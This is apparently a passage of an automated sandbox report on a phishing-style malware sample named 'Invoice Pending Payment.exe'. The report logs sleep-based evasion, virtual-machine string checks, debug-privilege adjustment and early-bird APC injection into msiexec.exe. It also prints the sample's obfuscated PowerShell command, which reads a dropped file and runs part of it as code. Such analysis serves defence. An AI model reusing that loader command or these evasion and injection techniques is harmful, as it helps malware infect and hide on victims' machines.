Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -594431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -594326s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -594219s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -593985s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Code function: 0_2_00405E6B FindFirstFileA,FindClose,	0_2_00405E6B
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Code function: 0_2_00405427 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405427
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Code function: 0_2_00402647 FindFirstFileA,	0_2_00402647

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594431	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594326	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior

Source: ModuleAnalysisCache.1.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.2073953654.00000000051E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\dq
Source: powershell.exe, 00000001.00000002.2073953654.00000000051E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\dq
Source: powershell.exe, 00000001.00000002.2073953654.00000000051E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\dq
Source: msiexec.exe, 00000006.00000002.2952367265.00000000057EA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2952367265.0000000005848000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	API call chain: ExitProcess graph end node			graph_0-3784
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	API call chain: ExitProcess graph end node			graph_0-3782

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_04A1F644 LdrInitializeThunk,

1_2_04A1F644

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

Code function: 0_2_00405E92 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405E92

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3A60000

Jump to behavior

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

Code function: 0_2_100010D3 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,DeleteFileA,GlobalAlloc,GlobalLock,GetVersionExA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,CreateProcessA,lstrcpyA,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenA,lstrlenA,lstrlenA,lstrcpynA,lstrlenA,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatA,GlobalSize,lstrlenA,lstrcpyA,CharNextA,GetTickCount,TerminateProcess,lstrcpyA,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,

0_2_100010D3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
